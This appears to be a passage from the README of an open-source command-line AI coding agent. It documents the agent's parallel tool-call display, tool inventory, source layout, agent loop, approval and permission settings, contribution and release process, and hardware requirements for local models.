You should see the model planning (TodoWrite), then creating the file, then running it via bash.

Worked examples

Longer, real workflows live in examples/:

examples/refactor.md — a multi-file rename with the test suite pinned as a safety net.
examples/whitelist-extension.md — opt pnpm / bun / deno into the read-only whitelist via MY_AI_SAFE_COMMANDS.
examples/think-discipline.md — what the dim stderr thinkpad looks like next to the clean stdout answer.
examples/v0.7.4-buffy-prompts.md — the v0.7.4 release-flow split: 5 Bufy-side (B1–B5) prompts paired with Claude's C1–C5. B1–B3 are the smoke × 3 + README-parity + Scenario E additions; B4–B5 are the npm publish + git push/gh release ops.

Parallel-tool chip layer (Tier 1.6 – 1.9)

When the model emits a parallel batch of tool calls, every batch reads as a bookended cluster on stderr:

Tier 1.6 pending → completed pills. A dim ⚡ N tool(s) in parallel header followed by cyan ○ pending pills (one per call), then a tinted completed pill below each: green ● ok, red ✖ err, yellow ⊘ blocked. The hint next to each completed pill summarizes the effect — path · CREATE (+N lines) for write_file, ±N lines for edit_file, $ cmd · N lines for bash, path · deleted, path · N issues for read_lints, etc. Pure presentation in src/chips.ts, ~180 lines.
Tier 1.7 cumulative batch timing. A second dim ⚡ N tool(s) · <time> line closes every batch — wallclock of the parallel dispatch, e.g. ⚡ 3 tools · 234ms. Anchors the perf signal to the chips it timed.
Tier 1.8 parallel-conflict detection. Two PLAN_TRACKED_TOOLS calls in the same parallel batch targeting the same path (currently write_file / edit_file / delete_file) silently last-write-wins under Promise.all. A neutral dim ⚠ <path> · colliding writes at indices <i,j,k> row renders AFTER the completed chips but BEFORE the timing summary — one per detected collision. The default profile also escalates these batches to the Tier 1.4 plan gate (the user reviews the colliding writes BEFORE they race) via src/cli.ts agentTurn's new threshold.trigger: "conflict". Path A (escalate-to-prompt) is current; Path B (auto-serialize) is opt-in via MY_AI_AUTO_SERIALIZE=1.
Tier 1.9 verbose-mode homogeneity. Under --verbose (or /verbose on), every chip class threads the flag: completed pills get a dim ↳ <result preview> line; pending pills get a dim ↳ args: <full JSON> line; the cumulative batch timing gets · slowest: <name> <ms|secs>; the conflict chip gets (name1, name2) so you can see WHICH tools raced. Non-verbose callers get the byte-identical Tier 1.6 output.
Tier 1.9 per-turn cost chip. Anthropic SDK reports exact input_tokens / output_tokens (↳ model-reported under verbose). The OpenAI-compatible Ollama endpoint doesn't surface usage, so output_tokens is approximated via the same Math.ceil(visibleContent.length / 4) heuristic the compactor uses (↳ estimate (chars/4) under verbose). The chip renders as a single dim 💸 ~<in> in / ~<out> out · <total> tok row between the conflict chips and the timing summary.

The full chip surface is pinned in tests/chips.test.ts (55 fixtures) and end-to-end exercised by tools/tier1.6-chip-smoke.ts (5 scenarios: A defaults B verbose C readonly D parallel-conflict E auto-serialize). Every claim above has a fixture or smoke scenario.

Tool inventory

| Tool | What it does | |---|---| | read_file | Reads file contents. Supports offset/limit for large files. | | write_file | Creates or overwrites a file (creates parent dirs). | | edit_file | Targeted string replacement. Errors if old_string isn't unique. | | bash | Runs shell commands with 5-minute timeout. Reserved for things that need a shell. | | list_dir | Lists immediate contents of a directory. | | Glob | Finds files by glob pattern (e.g. **/*.ts). | | Grep | Searches file contents with regex. Ripgrep when available, falls back to a pure-Node walker. | | WebFetch | Fetches a URL and returns readable text (strips HTML). | | TodoWrite | Tracks a task list in conversation. The model uses this to plan its work. | | ask_user | Pauses the loop and asks the human a structured question (single or multi select, with optional free-form fallback). Use when a decision, blocker, or missing credential should not be auto-resolved. Replaces ad-hoc prose questions with clean schema answers. | | tree | Compact read-only directory tree. Wraps src/explore.ts#fsTree. Skips node_modules, .git, and dotfiles by default; capped at depth 3 + 200 entries. The same helper powers the /tree slash command, so a delegated explorer / reviewer sub-agent can map a project without a flood of list_dir calls. |

Project structure

src/
├── cli.ts              # Main chat loop, message history, slash commands, approval gate
├── client.ts           # Provider dispatcher (reads PROVIDER env); runtime provider switch
├── doctor.ts           # /doctor + /doctor --explain (free-engine diagnostics)
├── prompts.ts          # System prompt (independently written; Claude Code-style behavior)
├── server.ts           # `my-ai serve` HTTP + SSE + /api/upload layer (BW-A1)
├── agent-engine.ts     # chat → tool dispatch loop shared with REPL's agentTurn (BW-A1)
├── tools.ts            # Tool definitions + execute() handlers
├── whitelist.ts        # Bash read-only whitelist + MY_AI_SAFE_COMMANDS merge (testable)
├── danger.ts           # Danger tagging for the approval prompt
├── audit.ts            # Append-only approval audit log (.my-ai/audit.log)
├── profiles.ts         # Permission profiles (default/readonly/paranoid)
├── compaction.ts       # Long-context compaction (fold oldest turns into a summary)
├── tokens.ts           # /tokens report (per-role + total + budget + utilization; reuse compaction's heuristic)
├── think.ts            # think-discipline state machine (visible vs. reasoning)
├── multimodal.ts        # File → ContentPart[] (image_url, text block, pdf extract, routed note) (BW-A2)
├── mentions-resolve.ts  # REPL @mention + serve uploaded-file → resolver, vision-gate aware (BW-A2)
├── image-meta.ts        # Pure image-header decoder (PNG/JPEG/GIF/WebP/BMP → {width,height,mime}) (BW-A2)
├── lang-detect.ts       # Per-message lang/code heuristic for the chat wire (BW-A2)
└── providers/
    ├── types.ts        # Provider interface, normalized Message types
    ├── capabilities.ts # providerSupportsImages(name, model) regex gate (BW-A2)
    ├── anthropic.ts    # Anthropic Claude SDK adapter
    ├── ollama.ts       # OpenAI-compatible adapter (Ollama, LM Studio, vLLM)
    └── mock.ts         # Offline scripted provider (test/smoke only, gated behind MY_AI_MOCK)
ui/
└── index.html         # `my-ai serve` chat UI shell — single-file HTML + inline JS (BW-A1)

How the tool loop works

You type a message.
The CLI sends it to the configured provider along with conversation history + available tools.
The model responds. It may:
- Return text only — we print it, end the turn.
- Call one or more tools — we run them in parallel, feed the results back as tool messages, and the model gets another turn.
Loop continues until the model's response has no tool_calls (i.e. it's done).

This is the same agentic tool-loop pattern Claude Code uses, reimplemented here from its publicly documented behavior.

Customizing

Change the model: edit OLLAMA_MODEL (or ANTHROPIC_MODEL) in .env.
Change the personality: edit src/prompts.ts.
Add a tool: define a ToolHandler in src/tools.ts and add it to the tools array.
Add a new provider: implement the Provider interface in a new file under src/providers/, then wire it up in src/client.ts.

Limitations

This is an MVP focused on being easy to read and run.

Approval prompts gate destructive / shell-spawning tools (bash, delete_file, read_lints) by default — bypass with --no-approve or MY_AI_AUTO_APPROVE=1 (see above).
No conversation persistence — /exit clears history. Restart loses context.
No sub-agent spawning — unlike Codebuff or Claude Code's Task tool, there's just one model.
No file_path:line_number rendering in the CLI (the model produces them, but the terminal won't hyperlink).
Local model quality is hardware-dependent — a 3b model will make mistakes a 32b won't. Pick a size that matches your GPU.

Contributing

CHANGELOG convention — every commit that ships a user-facing feature, behavior change, deprecation, or safety fix updates [CHANGELOG.md](./CHANGELOG.md)'s [Unreleased] section in the same commit (same-commit-per-feature rule). Doc-only, test-only, refactor-only, and chore commits are exempt — they don't ship anything a user would notice. See the top of CHANGELOG.md for the full rationale.
Tests pin behavior — any new code under src/ must also land a pinned test in tests/ (the established pattern is src/whitelist.ts + tests/whitelist.test.ts, a SAFE/UNSAFE battery that locks the safety boundary). Run npm test before committing. Regressions in the safety boundary are a real risk if tests are skipped.
Typecheck before commit — npm run typecheck must pass. CI (.github/workflows/ci.yml) runs typecheck + test + smoke on Node 20 and 22; the .githooks/pre-push hook runs the same gate locally (enable with git config core.hooksPath .githooks).
Commit message style — Conventional Commits prefix. Established prefixes in this repo: feat: (new feature), feat(scope): (scoped feature — e.g. feat(doctor)), fix: (bug fix), fix(scope): (scoped fix), chore(release): (release cut), docs: (doc-only commit that doesn't ship a behavior change). Use the scope tag to tie the commit to its component.
Releasing — when shipping a version, the cut is mechanical:
1. Open CHANGELOG.md, rename ## [Unreleased] to ## [X.Y.Z] - YYYY-MM-DD moving its contents into the new dated block, leave [Unreleased] empty for the next cycle.
2. Bump version in package.json to match.
3. Commit with chore(release): cut vX.Y.Z — <one-line summary> (use scoped env-var identity so global git config isn't touched; see chore(release): cut v0.4.0 for the established form).
4. Tag locally: git tag -a vX.Y.Z -m "vX.Y.Z — <summary>".
5. Extract the new section to release notes: bash tools/cut-release-section.sh vX.Y.Z > /tmp/vX.Y.Z-notes.md. The helper uses substring match so dotted version forms don't get tripped up by awk regex metachars.
6. Push: git push origin main (the release commit) and git push origin vX.Y.Z (the tag).
7. Publish: gh release create vX.Y.Z --title "vX.Y.Z — <summary>" --notes-file /tmp/vX.Y.Z-notes.md.
8. Rebuild the source tarball: git archive --format=tar.gz -o my-ai-vX.Y.Z.tar.gz vX.Y.Z (always from the local tag, never HEAD — keeps the tarball pinned to the released state).

Hardware sanity check

| Ollama model size | RAM | Recommended hardware | |---|---|---| | 3B params | 4 GB | Any modern laptop, CPU OK (slow) | | 7B params | 8 GB | 8 GB+ NVIDIA GPU recommended | | 13B params | 12 GB | 12 GB+ NVIDIA GPU | | 32B params | 20 GB | 24 GB GPU (e.g. RTX 3090/4090) | | 70B+ params | 40+ GB | Multi-GPU / server-grade |

If you have no GPU, stick to 3B and accept ~2–5 tokens/sec. With even a 6 GB GPU, 7B feels fast.

License

MIT